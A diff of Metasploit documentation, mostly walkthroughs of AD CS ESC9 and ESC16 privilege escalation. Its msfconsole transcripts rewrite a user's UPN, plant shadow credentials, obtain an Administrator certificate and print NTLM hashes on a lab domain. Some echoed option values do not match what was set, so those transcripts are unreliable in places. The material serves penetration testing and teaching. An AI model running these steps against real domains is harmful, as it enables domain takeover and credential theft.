+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
+[+] The operation completed successfully!
+[*] 172.16.199.200:445 - Adding shadow credentials for user2
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] Certificate stored at: /Users/jheysel/.msf4/loot/20250717152132_default_172.16.199.200_windows.ad.cs_473934.pfx
+[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 0d055983-7921-797a-529e-259b4b7542a2
+[*] 172.16.199.200:445 - Loading admin/kerberos/get_ticket
+[*] 172.16.199.200:445 - Getting hash for user2
+[!] Warning: Provided principal and realm (user2@kerberos.issue) do not match entries in certificate:
+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717152132_default_172.16.199.200_mit.kerberos.cca_930617.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for user2@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717152132_default_172.16.199.200_mit.kerberos.cca_355422.bin
+[+] Found NTLM hash for user2: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
+[*] 172.16.199.200:445 - Certificate UPN: Administrator
+[*] 172.16.199.200:445 - Certificate stored at: /Users/jheysel/.msf4/loot/20250717152134_default_172.16.199.200_windows.ad.cs_383174.pfx
+[*] 172.16.199.200:445 - reverting ldap object
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[+] Deleted entry with device ID 0d055983-7921-797a-529e-259b4b7542a2
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName: Administrator
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to user2...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to user2
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+```
+
+With the certificate issued, the attacker can then use the `kerberos/get_ticket` module to obtain the hash of the admin user:
+```
+msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhost=172.16.199.200 cert_file=//Users/jheysel/.msf4/loot/20250717152134_default_172.16.199.200_windows.ad.cs_383174.pfx username=Administrator domain=kerberos.issue
+[*] Running module against 172.16.199.200
+[!] Warning: Provided principal and realm (Administrator@kerberos.issue) do not match entries in certificate:
+[!]   * Administrator@
+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717152325_default_172.16.199.200_mit.kerberos.cca_344926.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for Administrator@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717152325_default_172.16.199.200_mit.kerberos.cca_598018.bin
+[+] Found NTLM hash for Administrator: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
+[*] Auxiliary module execution completed
+```
+
+## ESC16 Scenario 2
+If domain controllers are in Full Enforcement mode (`StrongCertificateBindingEnforcement` == 2), ESC16 alone would normally
+prevent authentication using certificates that lack the required SID extension. However, if the CA is also vulnerable
+to ESC6, which is defined as: `EDITF_ATTRIBUTESUBJECTALTNAME2` flag is set under it's `EditFlags` registry key, located here:
+`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA-Name>\PolicyModules\<PolicyModuleName>\`
+then the CA accepts arbitrary SAN values from certificate request attribute and an attacker can still bypass strong
+certificate mapping.
+
+In this case, the attacker requests a certificate from the ESC16-affected CA using any client authentication template
+(like "User"), which ensures the SID security extension is omitted. At the same time, they exploit the ESC6 weakness to
+inject a custom Subject Alternative Name that includes both a forged UPN and a specially crafted SID value using the format:
+`URI:tag:microsoft.com,2022-09-14:sid:<SID>`. This format was introduced in the May 2022 KB5014754 update and
+intended to help support strong certificate mappings between the user SID and the certificate.
+
+Because the certificate lacks the official SID extension (due to ESC16) but includes a valid-looking SAN SID URI
+(via ESC6), the domain controller accepts it and maps the certificate using the supplied SID—even in Full Enforcement mode.
+
+The way you would exploit ESC16 Scenario 2 with Metasploit is different than Scenario 1 as we don't need to update
+any LDAP objects, and so we can use the `icpr_cert` module to request a certificate. 
+```
+msf6 auxiliary(admin/dcerpc/icpr_cert) >  set alt_sid S-1-5-21-2324486357-3075865580-3606784161-500
+alt_sid => S-1-5-21-1655260159-4293876351-2321352318-500
+msf6 auxiliary(admin/dcerpc/icpr_cert) >  set alt_upn Administrator@kerberos.issue
+alt_upn => Administrator@msf.local
+msf6 auxiliary(admin/dcerpc/icpr_cert) >  set ca kerberos-DC2-CA
+ca => msf-DC3-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) >  set cert_template User
+cert_template => User
+msf6 auxiliary(admin/dcerpc/icpr_cert) >  set RHOSTS 172.16.199.200
+RHOSTS => 172.16.199.130
+msf6 auxiliary(admin/dcerpc/icpr_cert) >  set smbdomain kerberos.issue
+smbdomain => msf.local
+msf6 auxiliary(admin/dcerpc/icpr_cert) >  set smbpass N0tpassword!
+smbpass => N0tpassword!
+msf6 auxiliary(admin/dcerpc/icpr_cert) >  set smbuser user1
+smbuser => user1
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 172.16.199.200
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.4 (Secure Email)
+[*] 172.16.199.200:445 -   * 1.3.6.1.4.1.311.10.3.4 (Encrypting File System)
+[*] 172.16.199.200:445 - Certificate UPN: Administrator@kerberos.issue
+[*] 172.16.199.200:445 - Certificate URI: tag:microsoft.com,2022-09-14:sid:S-1-5-21-2324486357-3075865580-3606784161-500, S-1-5-21-2324486357-3075865580-3606784161-500
+[*] 172.16.199.200:445 - Certificate stored at: /Users/jheysel/.msf4/loot/20250711145606_default_172.16.199.200_windows.ad.cs_597422.pfx
+[*] Auxiliary module execution completed
+
+
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > use admin/kerberos/get_ticket
+[*] Using action GET_TGT - view all 3 actions with the show actions command
+msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhost=172.16.199.200 cert_file=/Users/jheysel/.msf4/loot/20250711145606_default_172.16.199.200_windows.ad.cs_597422.pfx
+[*] Running module against 172.16.199.200
+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250711145619_default_172.16.199.200_mit.kerberos.cca_635830.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for Administrator@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250711145619_default_172.16.199.200_mit.kerberos.cca_787259.bin
+[+] Found NTLM hash for Administrator: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
+[*] Auxiliary module execution completed
+```
+
 # Authenticating With A Certificate
 Metasploit supports authenticating with certificates in a couple of different ways. These techniques can be used to take
 further actions once a certificate has been issued for a particular identity (such as a Domain Admin user).
@@ -52,79 +52,4 @@ Microsoft provides a very useful [training module](https://learn.microsoft.com/e
 that covers the fundamentals of AD CS and as well as examples which cover the management of certificate enrollment, certificate revocation and certificate trusts.

 ## Setting up A Vulnerable AD CS Server
-The following steps assume that you have installed an AD CS on either a new or existing domain controller.
-### Installing AD CS
-1. Open the Server Manager
-2. Select Add roles and features
-3. Select "Active Directory Certificate Services" under the "Server Roles" section
-4. When prompted add all of the features and management tools
-5. On the AD CS "Role Services" tab, leave the default selection of only "Certificate Authority"
-6. Completion the installation and reboot the server
-7. Reopen the Server Manager
-8. Go to the AD CS tab and where it says "Configuration Required", hit "More" then "Configure Active Directory Certificate..."
-9. Select "Certificate Authority" in the Role Services tab
-10. Select "Enterprise CA" in the "Setup Type" tab (the user must be a Domain Administrator for this option to be available)
-11. Keep all of the default settings, noting the value of the "Common name for this CA" on the "CA Name" tab (this value corresponds to the `CA` datastore option)
-12. Accept the rest of the default settings and complete the configuration
-
-### Setting up a ESC1 Vulnerable Certificate Template
-1. Open up the run prompt and type in `certsrv`.
-2. In the window that appears you should see your list of certification authorities under `Certification Authority (Local)`. Right click on the folder in the drop down marked `Certificate Templates` and then click `Manage`.
-3. Scroll down to the `User` certificate. Right click on it and select `Duplicate Template`.
-4. From here you can refer to the following [Active-Directory-Certificate-Services-abuse](https://github.com/RayRRT/Active-Directory-Certificate-Services-abuse/blob/3da1d59f1b66dd0e381b2371b8fb42d87e2c9f82/ADCS.md) documentation for screenshots.
-5. Select the `General` tab and rename this to something meaningful like `ESC1-Template`, then click the `Apply` button.
-6. In the `Subject Name` tab, select `Supply in the request` and click `Ok` on the security warning that appears. Then click the `Apply` button.
-7. Scroll to the `Extensions` tab and under `Application Policies` ensure that `Client Authentication`, `Server Authentication`, `KDC Authentication`, or `Smart Card Logon`  is listed. Then click the `Apply` button.
-8. Under the `Security` tab make sure that `Domain Users` group listed and the `Enroll` permissions is marked as allowed for this group.
-9. Under `Issuance Requirements` tab, ensure that under `Require the following for enrollment` that the `CA certificate manager approval` box is unticked, as is the `This number of authorized signatures` box.
-10. Click `Apply` and then `Ok`
-11. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
-12. Scroll down and select the `ESC1-Template` certificate, or whatever you named the ESC1 template you created, and select `OK`. The certificate should now be available to be issued by the CA server.
-
-### Setting up a ESC2 Vulnerable Certificate Template
-1. Open up `certsrv`
-2. Scroll down to `Certificate Templates` folder, right click on it and select `Manage`.
-3. Find the `ESC1` certificate template you created earlier and right click on that, then select `Duplicate Template`.
-4. Select the `General` tab, and then name the template `ESC2-Template`. Then click `Apply`.
-5. Go to the `Subject Name` tab and select `Build from this Active Directory Information` and select `Fully distinguished name` under the `Subject Name Format`. The main idea of setting this option is to prevent being able to supply the subject name in the request as this is more what makes the certificate vulnerable to ESC1. The specific options here I don't think will matter so much so long as the `Supply in the request` option isn't ticked. Then click `Apply`.
-6. Go the to `Extensions` tab and click on `Application Policies`. Then click on `Edit`.
-7. Delete all the existing application policies by clicking on them one by one and clicking the `Remove` button.
-8. Click the `Add` button and select `Any Purpose` from the list that appears. Then click the `OK` button.
-9. Click the `Apply` button, and then `OK`. The certificate should now be created.
-10. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
-11. Scroll down and select the `ESC2-Template` certificate, or whatever you named the ESC2 template you created, and select `OK`. The certificate should now be available to be issued by the CA server.
-
-### Setting up a ESC3 Template 1 Vulnerable Certificate Template
-1. Follow the instructions above to duplicate the ESC2 template and name it `ESC3-Template1`, then click `Apply`.
-2. Go to the `Extensions` tab, click the Application Policies entry, click the `Edit` button, and remove the `Any Purpose` policy and replace it with `Certificate Request Agent`, then click `OK`.
-3. Click `Apply`.
-4. Go to `Issuance Requirements` tab and double check that both `CA certificate manager approval` and `This number of authorized signatures` are unchecked.
-5. Click `Apply` if any changes were made or the button is not grey'd out, then click `OK` to create the certificate.
-6. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
-7. Scroll down and select the `ESC3-Template1` certificate, or whatever you named the ESC3 template number 1 template you just created, and select `OK`. The certificate should now be available to be issued by the CA server.
-
-### Setting up a ESC3 Template 2 Vulnerable Certificate Template
-1. Follow the instructions above to duplicate the ESC2 template and name it `ESC3-Template2`, then click `Apply`.
-2. Go to the `Extensions` tab, click the Application Policies entry, click the `Edit` button, and remove the `Any Purpose` policy and replace it with `Client Authentication`, then click `OK`.
-3. Click `Apply`.
-4. Go to `Issuance Requirements` tab and double check that both `CA certificate manager approval` is unchecked.
-5. Check the `This number of authorized signatures` checkbox and ensure the value specified is 1, and that the `Policy type required in signature` is set to `Application Policy`, and that the `Application policy` value is `Certificate Request Agent`.
-6. Click `Apply` and then click `OK` to issue the certificate.
-7. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
-8. Scroll down and select the `ESC3-Template2` certificate, or whatever you named the ESC3 template number 2 template you just created, and select `OK`. The certificate should now be available to be issued by the CA server.
-
-### Setting up a ESC8 Vulnerable Host
-1. Follow instructions for creating an AD CS enabled server
-2. Select Add Roles and Features
-3. Under "Select Server Roles" expand Active Directory Certificate Services and add `Certificate Enrollment Policy Web Service`, `Certificate Enrollment Web Service`, and `Certificate Authority Web Enrollment`.
-4. For each selection, accept the default for any pop-up.
-5. Accept the default features and install.
-6. When the installation is complete, click on the warning in the Dashboard for post-deployment configuration.
-7. Under Credentials, accept the default
-8. Under Role Services, select `Certificate Authority Web Enrollment`, `Certificate Enrollment Web Service`, and `Certificate Enrollment Policy Web Service`
-9. In CA for CES, accept the defaults
-10. In Authentication Types, accept the default integrated authentication
-11. In Service account for CES, select `Use built-in application pool identity`
-12. Accept default integrated authentication for CEP
-13. Select the domain certificate in Server Certificate (the one that starts with the domain name by default) if more than one appears.
-14. Accept the remaining defaults.
+The steps for setting up a vulnerable AD CS server are covered in the [[Installing AD CS|./ldap_esc_vulnerable_cert_finder.md]] section.
@@ -142,7 +142,7 @@ Optional options:
    * `read-only` -- Stored tickets from the cache will be used, but no new tickets are stored.
    * `write-only` -- New tickets are requested and they are stored for reuse.
    * `read-write` -- Stored tickets from the cache will be used and new tickets will be stored for reuse.
-* `${Prefix}KrbOfferedEncryptionTypes' -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. `SmbKrbOfferedEncryptionTypes=AES256`
+* `${Prefix}KrbOfferedEncryptionTypes` -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. `SmbKrbOfferedEncryptionTypes=AES256`

 ## Ticket management

@@ -597,6 +597,10 @@ NAVIGATION_CONFIG = [
                  },
                ]
              },
+              {
+                path: 'Post-Mixins.md',
+                title: 'PostMixins'
+              },
              {
                path: 'How-to-log-in-Metasploit.md',
                title: 'Logging'
@@ -54,9 +54,9 @@ retrieve deployment packages from S3.
 The VPC or Virtual Private Cloud, an isolated local area network. Network access
 can be made available by assigning an Internet routable IP address to a host or
 routing traffic to it through an ELB (Elastic Load Balancer). In either case
-security-groups are used to open access to network ranges and specific TPC/UDP
+security-groups are used to open access to network ranges and specific TCP/UDP
 ports. Security-groups provide much of the functionality of traditional firewalls
-and can be configured by specifying a protocol, a CIDR and a port. 
+and can be configured by specifying a protocol, a CIDR and a port.

 ## How it Works

@@ -65,7 +65,7 @@ Web console or the CLI, launching a host in the Cloud requires a fair
 amount of configuration; this module does its best to abstract configuration
 requirements away from the user by auto detecting the VPC, subnets, creating
 security groups, etc. It performs several tasks to launch a host with
-a public IP address, these are as follow: 1) select a VPC, 2) select a subnet, 3)
+a public IP address, these are as follows: 1) select a VPC, 2) select a subnet, 3)
 create/select a security group, 4) create/select a key-pair, and 5) launch
 a host.

@@ -80,7 +80,7 @@ an Internet routable IP address. The module dynamically finds which subnet to
 launch the host in. It will use the first subnet it finds having the
 `Auto-assign Public IP` option set, if no such subnet exists, then it will
 select the first subnet having an Internet gateway. To circumvent this process,
-the `SUBNET_ID` advanced option can be set. 
+the `SUBNET_ID` advanced option can be set.

 When launching a Cloud host at least one security group is required. There are
 several advanced options for creating/selecting a security group. The
@@ -88,7 +88,7 @@ several advanced options for creating/selecting a security group. The
 That is, the module will create a security group unless the `SEC_GROUP_ID`
 options is set. If the `SEC_GROUP_ID` option is not set, the module will attempt
 to create a security group using the values specified in the `SEC_GROUP_CIDR`,
-`SEC_GROUP_NAME`, and `SEC_GROUP_PORT` options as configuration. 
+`SEC_GROUP_NAME`, and `SEC_GROUP_PORT` options as configuration.

 The `KEY_NAME` and `SSH_PUB_KEY` options are used in conjunction to select or
 create a key-pair (a named SSH public key). Key-pairs are used to authenticate
@@ -113,7 +113,7 @@ use command. To run the module, only the `AccessKeyId`, `SecretAccessKey`, and
 Basic Options:

 * `AMI_ID`: The Amazon Machine Image (AMI) ID (region dependent)
-* `RHOST`: the AWS EC2 Endpoint (ec2.us-west-2.amazonaws.com), may change this to something closer to you
+* `RHOST`: The AWS EC2 Endpoint (ec2.us-west-2.amazonaws.com), may change this to something closer to you
 * `Region`: The default region (us-west-2), must match endpoint
 * `AccessKeyId`: AWS API access key
 * `SecretAccessKey`: AWS API secret access key
@@ -129,10 +129,10 @@ Advanced Options:
 * `MinCount`: Minimum number of instances to launch
 * `ROLE_NAME`: The instance profile/role name
 * `RPORT:` AWS EC2 Endpoint TCP Port
-* `SEC_GROUP_ID`: the EC2 security group to use
-* `SEC_GROUP_CIDR`: the EC2 security group network access CIDR, defaults to 0.0.0.0/0
-* `SEC_GROUP_NAME`: the EC2 security group name
-* `SEC_GROUP_PORT`: the EC2 security group network access port, defaults to tcp:22
+* `SEC_GROUP_ID`: The EC2 security group to use
+* `SEC_GROUP_CIDR`: The EC2 security group network access CIDR, defaults to 0.0.0.0/0
+* `SEC_GROUP_NAME`: The EC2 security group name
+* `SEC_GROUP_PORT`: The EC2 security group network access port, defaults to tcp:22
 * `SUBNET_ID`: The public subnet to use
 * `UserAgent`: The User-Agent header to use for all requests
 * `VPC_ID`: The EC2 VPC ID
@@ -181,7 +181,7 @@ msf auxiliary(aws_launch_instances) > run
 ...
 [*] instance i-12345678 status: ok
 [*] Instance i-12345678 has IP address 54.186.158.6
-[*] Auxiliary module execution completed 
+[*] Auxiliary module execution completed
 ```

 When the host has passed its primary system checks, the IP address will be
@@ -12,7 +12,7 @@ Only the deprecated DIAL protocol is supported by this module. Casting via the n

 ## Options

-  **VID**
+### VID

  The YouTube video to be played.  Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo)

@@ -0,0 +1,277 @@
+## Vulnerable Application
+This module requests certificates via MS-ICPR (Active Directory Certificate Services) after updating an LDAP object
+attribute, typically on behalf of another user. The certificate's usability depends on the configuration of the
+certificate template, enabling operations such as authentication. PFX certificate files generated by this module are
+encrypted with a blank password.
+
+To perform the LDAP attribute update, the module requires write privileges over the
+target user in the domain. For example, it can modify the userPrincipalName (UPN) or dNSHostName of the target user
+before requesting the certificate. This module leverages the generic auxiliary/admin/ldap/ldap_object_attribute module
+to handle LDAP attribute updates.
+
+
+This module is capable of exploiting ESC9, ESC10, and ESC16.
+
+### Setup
+Follow the instructions [[here|./ad-certificates/overview.md]] to set up an AD CS server that is vulnerable to the scenarios you want to exploit, with the appropriately configured template.
+For detailed information on each ESC attack workflow, refer to the [[AD CS Exploitation Scenarios|./ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md]] documentation.
+
+## Options
+
+### LDAPUsername
+The username to authenticate to the LDAP server, this must be a user with write access over the `TARGET_USERNAME`.
+
+### LDAPPassword
+The password for the `LDAPUsername` account.
+
+### LDAPDomain
+The domain of the `LDAPUsername`, e.g., `demo.local`.
+
+### CA
+The target certificate authority.
+
+### CERT_TEMPLATE
+The certificate template to issue, e.g., "User".
+
+### TARGET_USERNAME
+The username of the target account whose LDAP object will be updated and for whom the certificate will be requested.
+
+### TARGET_PASSWORD
+The password of the target username. Not required. The module will use Shadow Credentials to authenticate as the target user if this is left blank.
+
+### UPDATE_LDAP_OBJECT
+The LDAP attribute to update, such as `userPrincipalName` or `dNSHostName`.
+
+### UPDATE_LDAP_OBJECT_VALUE
+The new value to set for the specified LDAP attribute, set this to the user name you wish to impersonate, e.g., `Administrator` if you're updating the `userPrincipalName`.
+If you're updating the `dNSHostName`, set this to the desired DNS hostname, e.g., `host.domain.local` (it must be a valid FQDN in this case).
+
+### ALT_UPN
+An alternate UPN (User Principal Name) to set for the target user, e.g., `Administrator@domain.local`.
+
+### ALT_SID
+An alternate SID (Security Identifier) to set for the target user, e.g., `S-1-5-21-...`.
+
+### ALT_DNS
+An alternate DNS hostname to set for the target user, e.g., `host.domain.local`.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use esc_update_ldap_object`
+1. Set the `RHOST`, `LDAPUsername`, `LDAPPassword` and `LDAPDomain` options - note these credentials need to have write access over the `TARGET_USERNAME`
+1. Set `TARGET_USERNAME` to the user you want to update and then request a certificate for
+1. Set the `UPDATE_LDAP_OBJECT` to either `userPrincipalName` or `dNSHostName` depending on the scenario you are exploiting
+1. Set the `UPDATE_LDAP_OBJECT_VALUE` to the value you want to set for the `UPDATE_LDAP_OBJECT`, e.g., `Administrator`
+1. Set `CA` to the name of the CA you want to request a certificate and `cert_template` to the name of the certificate template you want to use
+1. Run the module
+1. This should update the LDAP object attribute and request a certificate for the target user, which will be saved as a .pfx file.
+1. If the target is vulnerable to the scenario you are exploiting, the pfx file will allow for privilege escalation.
+
+## Scenarios
+
+### ESC9 - Update userPrincipalName to Administrator
+```
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldaprport 389
+ldaprport => 389
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set target_username user2
+target_username => user2
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapdomain kerberos.issue
+ldapdomain => kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldappassword N0tpassword!
+ldappassword => N0tpassword!
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapusername user1
+ldapusername => user1
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set cert_template ESC9-Template
+cert_template => SpencerTest
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ca kerberos-DC2-CA
+ca => kerberos-DC2-CA
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT_VALUE Administrator
+UPDATE_LDAP_OBJECT_VALUE => Administrator
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName: user2
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
+[+] The operation completed successfully!
+[*] 172.16.199.200:445 - Adding shadow credentials for user2
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] Certificate stored at: /Users/jheysel/.msf4/loot/20250717140905_default_172.16.199.200_windows.ad.cs_563081.pfx
+[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 2ff08c15-0ab3-98ad-ee0b-3fd1fbcf3e9d
+[*] 172.16.199.200:445 - Loading admin/kerberos/get_ticket
+[*] 172.16.199.200:445 - Getting hash for user2
+[!] Warning: Provided principal and realm (user2@kerberos.issue) do not match entries in certificate:
+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717140905_default_172.16.199.200_mit.kerberos.cca_263627.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for user2@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717140905_default_172.16.199.200_mit.kerberos.cca_015140.bin
+[+] Found NTLM hash for user2: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
+[*] 172.16.199.200:445 - Certificate UPN: Administrator
+[*] 172.16.199.200:445 - Certificate stored at: /Users/jheysel/.msf4/loot/20250717140907_default_172.16.199.200_windows.ad.cs_548728.pfx
+[*] 172.16.199.200:445 - reverting ldap object
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] No matching entries found - check device ID
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName: Administrator
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to user2...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to user2
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+```
+
+### ESC9 - Update userPrincipalName when you already have `TARGET_PASSWORD`. See shadow credentials don't get created / used
+```
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) > options
+
+Module options (auxiliary/admin/dcerpc/esc_update_ldap_object):
+
+   Name                      Current Setting    Required  Description
+   ----                      ---------------    --------  -----------
+   ADD_CERT_APP_POLICY                          no        Add certificate application policy OIDs
+   ALT_DNS                                      no        Alternative certificate DNS
+   ALT_SID                                      no        Alternative object SID
+   ALT_UPN                                      no        Alternative certificate UPN (format: USER@DOMAIN)
+   CA                        kerberos-DC2-CA    yes       The target certificate authority
+   CERT_TEMPLATE             User               yes       The certificate template
+   LDAPDomain                kerberos.issue     yes       The domain to authenticate to
+   LDAPPassword              N0tpassword!       yes       The password to authenticate with
+   LDAPUsername              user1              yes       The username to authenticate with, who must have permissions to update the TARGET_USERNAME
+   SSL                       false              no        Enable SSL on the LDAP connection
+   TARGET_PASSWORD           N0tpassword!       no        The password of the target LDAP object (the victim account). If left blank, Shadow Credentials will be used to authenticaet as the TARGET_USERNAME
+   TARGET_USERNAME           user2              yes       The username of the target LDAP object (the victim account).
+   UPDATE_LDAP_OBJECT        userPrincipalName  yes       Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. (Accepted: userPrincipalName, dNSHostName)
+   UPDATE_LDAP_OBJECT_VALUE  Administrator      yes       The account name you wish to impersonate
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  172.16.199.200   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT   445              no        The target port (TCP)
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   REQUEST_CERT  Request a certificate
+
+
+
+View the full module info with the info, or info -d command.
+
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName:
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
+[+] The operation completed successfully!
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 - Certificate UPN: Administrator
+[*] 172.16.199.200:445 - Certificate stored at: /home/msfuser/.msf4/loot/20250923135918_default_172.16.199.200_windows.ad.cs_341723.pfx
+[*] 172.16.199.200:445 - Reverting ldap object
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Attempting to delete attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue...
+[+] Successfully deleted attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue
+[+] The operation completed successfully!
